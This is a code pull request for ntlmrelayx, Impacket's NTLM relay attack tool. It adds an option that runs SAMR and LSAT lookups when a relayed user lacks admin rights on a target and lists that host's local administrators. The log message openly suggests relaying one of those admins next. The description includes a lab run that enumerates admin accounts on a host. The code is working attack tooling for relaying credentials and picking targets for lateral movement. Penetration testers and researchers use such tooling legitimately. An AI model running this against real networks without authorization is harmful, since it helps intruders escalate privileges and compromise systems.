### PR TITLE
added enum local admins option

### DIFF
--- a/examples/ntlmrelayx.py
+++ b/examples/ntlmrelayx.py
@@ -132,6 +132,7 @@ def start_servers(options, threads):
         c.setTargets(targetSystem)
         c.setExeFile(options.e)
         c.setCommand(options.c)
+        c.setEnumLocalAdmins(options.enum_local_admins)
         c.setEncoding(codec)
         c.setMode(mode)
         c.setAttacks(PROTOCOL_ATTACKS)
@@ -229,6 +230,7 @@ if __name__ == '__main__':
     smboptions.add_argument('-c', action='store', type=str, required=False, metavar = 'COMMAND', help='Command to execute on '
                         'target system. If not specified, hashes will be dumped (secretsdump.py must be in the same '
                                                           'directory).')
+    smboptions.add_argument('--enum-local-admins', action='store_true', required=False, help='If relayed user is not admin, attempt SAMR lookup to see who is (only works pre Win 10 Anniversary)')
 
     #MSSQL arguments
     mssqloptions = parser.add_argument_group("MSSQL client options")

--- a/impacket/examples/ntlmrelayx/attacks/smbattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/smbattack.py
@@ -22,8 +22,12 @@ from impacket import smb3, smb
 from impacket.examples import serviceinstall
 from impacket.smbconnection import SMBConnection
 from impacket.examples.smbclient import MiniImpacketShell
+from impacket.dcerpc.v5.rpcrt import DCERPCException
 
 PROTOCOL_ATTACK_CLASS = "SMBAttack"
+
+#Define global localAdminMap
+localAdminMap = {}
 
 class SMBAttack(ProtocolAttack):
     """
@@ -50,6 +54,16 @@ class SMBAttack(ProtocolAttack):
     def __answer(self, data):
         self.__answerTMP += data
 
+    def __updateAdminMap(self, adminNames):
+        global localAdminMap
+        hostname = self.__SMBConnection.getRemoteHost()
+        for name in adminNames:
+            if name in localAdminMap:
+                localAdminMap[name].append(hostname)
+            else:
+                localAdminMap[name] = [hostname]
+        return
+
     def run(self):
         # Here PUT YOUR CODE!
         if self.tcpshell is not None:
@@ -66,6 +80,7 @@ class SMBAttack(ProtocolAttack):
                 self.installService.uninstall()
         else:
             from impacket.examples.secretsdump import RemoteOperations, SAMHashes
+            from impacket.examples.ntlmrelayx.utils.enum import EnumLocalAdmins
             samHashes = None
             try:
                 # We have to add some flags just in case the original client did not
@@ -78,7 +93,20 @@ class SMBAttack(ProtocolAttack):
                 remoteOps  = RemoteOperations(self.__SMBConnection, False)
                 remoteOps.enableRegistry()
             except Exception, e:
-                # Something went wrong, most probably we don't have access as admin. aborting
+                if "rpc_s_access_denied" in str(e): # user doesn't have correct privileges
+                    if self.config.enumLocalAdmins:
+                        LOG.info("Relayed user doesn't have admin on {}. Attempting to enumerate users who do...".format(self.__SMBConnection.getRemoteHost()))
+                        enumLocalAdmins = EnumLocalAdmins(self.__SMBConnection)
+                        try:
+                            localAdminSids, localAdminNames = enumLocalAdmins.getLocalAdmins()
+                            self.__updateAdminMap(localAdminNames)
+                            LOG.info("Host {} has the following local admins (hint: try relaying one of them here...)".format(self.__SMBConnection.getRemoteHost()))
+                            for name in localAdminNames:
+                                LOG.info("Host {} local admin member: {} ".format(self.__SMBConnection.getRemoteHost(), name))
+                        except DCERPCException, e:
+                            LOG.info("SAMR access denied")
+                        return
+                # Something else went wrong. aborting
                 LOG.error(str(e))
                 return
 

--- a/impacket/examples/ntlmrelayx/utils/config.py
+++ b/impacket/examples/ntlmrelayx/utils/config.py
@@ -49,6 +49,7 @@ class NTLMRelayxConfig:
         self.exeFile = None
         self.command = None
         self.interactive = False
+        self.enumLocalAdmins = False
 
         # LDAP options
         self.dumpdomain = True
@@ -91,6 +92,9 @@ class NTLMRelayxConfig:
 
     def setCommand(self, command):
         self.command = command
+
+    def setEnumLocalAdmins(self, enumLocalAdmins):
+        self.enumLocalAdmins = enumLocalAdmins
 
     def setEncoding(self, encoding):
         self.encoding = encoding

--- a/impacket/examples/ntlmrelayx/utils/enum.py
+++ b/impacket/examples/ntlmrelayx/utils/enum.py
@@ -1,0 +1,70 @@
+# Copyright (c) 2013-2016 CORE Security Technologies
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Config utilities
+#
+# Author:
+#  Ronnie Flathers / @ropnop
+#
+# Description:
+#     Helpful enum methods for discovering local admins through SAMR and LSAT
+
+from impacket.dcerpc.v5 import transport, lsat, lsad, samr
+from impacket.dcerpc.v5.dtypes import MAXIMUM_ALLOWED
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket.dcerpc.v5.samr import SID_NAME_USE
+
+
+class EnumLocalAdmins:
+    def __init__(self, smbConnection):
+        self.__smbConnection = smbConnection
+        self.__samrBinding = r'ncacn_np:445[\pipe\samr]'
+        self.__lsaBinding = r'ncacn_np:445[\pipe\lsarpc]'
+
+    def __getDceBinding(self, strBinding):
+        rpc = transport.DCERPCTransportFactory(strBinding)
+        rpc.set_smb_connection(self.__smbConnection)
+        return rpc.get_dce_rpc()
+
+    def getLocalAdmins(self):
+        adminSids = self.__getLocalAdminSids()
+        adminNames = self.__resolveSids(adminSids)
+        return adminSids, adminNames
+
+    def __getLocalAdminSids(self):
+        dce = self.__getDceBinding(self.__samrBinding)
+        dce.connect()
+        dce.bind(samr.MSRPC_UUID_SAMR)
+        resp = samr.hSamrConnect(dce)
+        serverHandle = resp['ServerHandle']
+
+        resp = samr.hSamrLookupDomainInSamServer(dce, serverHandle, 'Builtin')
+        resp = samr.hSamrOpenDomain(dce, serverHandle=serverHandle, domainId=resp['DomainId'])
+        domainHandle = resp['DomainHandle']
+        resp = samr.hSamrEnumerateAliasesInDomain(dce, domainHandle)
+        aliases = {}
+        for alias in resp['Buffer']['Buffer']:
+            aliases[alias['Name']] =  alias['RelativeId']
+        resp = samr.hSamrOpenAlias(dce, domainHandle, desiredAccess=MAXIMUM_ALLOWED, aliasId=aliases['Administrators'])
+        resp = samr.hSamrGetMembersInAlias(dce, resp['AliasHandle'])
+        memberSids = []
+        for member in resp['Members']['Sids']:
+            memberSids.append(member['SidPointer'].formatCanonical())
+        dce.disconnect()
+        return memberSids
+
+    def __resolveSids(self, sids):
+        dce = self.__getDceBinding(self.__lsaBinding)
+        dce.connect()
+        dce.bind(lsat.MSRPC_UUID_LSAT)
+        resp = lsat.hLsarOpenPolicy2(dce, MAXIMUM_ALLOWED | lsat.POLICY_LOOKUP_NAMES)
+        policyHandle = resp['PolicyHandle']
+        resp = lsat.hLsarLookupSids(dce, policyHandle, sids, lsat.LSAP_LOOKUP_LEVEL.LsapLookupWksta)
+        names = []
+        for n, item in enumerate(resp['TranslatedNames']['Names']):
+            names.append("{}\\{}".format(resp['ReferencedDomains']['Domains'][item['DomainIndex']]['Name'], item['Name']))
+        dce.disconnect()
+        return names


### PR DESCRIPTION
This PR adds a new feature to ntlmrelayx specifically around enumeration when relaying an underprivileged user (i.e. command execution or SAM dump fails)

The tool will now attempt a SAMR and LSAT lookup against the target to determine who is a member of the local administrators group. The local admins are added to global dictionary. The option added for this feature are:

```
--enum-local-admins   If relayed user is not admin, attempt SAMR lookup to
                        see who is (only works pre Win 10 Anniversary)
```

In action it looks like this if SAMR access is allowed (Win7 and older Win10):

```
$ python examples/ntlmrelayx.py -tf examples/targets.txt --enum-local-admins

...snipped...

[*] Authenticating against smb://172.16.13.13 as ROPNOP\thoffman SUCCEED                                
[*] Relayed user doesn't have admin on 172.16.13.13. Attempting to enumerate users who do...            
[*] Host 172.16.13.13 has the following local admins (hint: try relaying one of them here...)           
[*] Host 172.16.13.13 local admin member: ws02win7\Administrator                                        
[*] Host 172.16.13.13 local admin member: ws02win7\friarfrank                                           
[*] Host 172.16.13.13 local admin member: ROPNOP\Domain Admins                                          
[*] Host 172.16.13.13 local admin member: ROPNOP\tgwynn                                                 
^C

```
If the target is a Win10 Anniversary box or later where SAMR access is denied to non local admins, the error is handled and the output is logged:

`[*] SAMR access denied`

In future versions, I would like to feed the localAdminMap dictionary back into the targets utils for some "intelligent" target selection.

To add this feature, I modified the SMBAttack class to run the enumeration technique if an access denied is encountered. To pass the option, I also added the necessary configs to NTLMRelayxConfig. The actual enumeration "attacks" are in a new file located in ntlmrelayx's utils and imported like this:
`from impacket.examples.ntlmrelayx.utils.enum import EnumLocalAdmins`

Let me know if you think the code changes and locations make sense. I've tested it in my lab and it's working (on a small scale) but more testing is probably needed with multiple concurrent incoming connections. I'm pretty sure it is still thread safe as Python's global dictionary operations should be thread safe. For future features, the global `localAdminmap` can be passed around and referenced for target selection. The keys in the dictionary are the usernames, and the value is an array of IP addresses where the user was found to have local admin rights.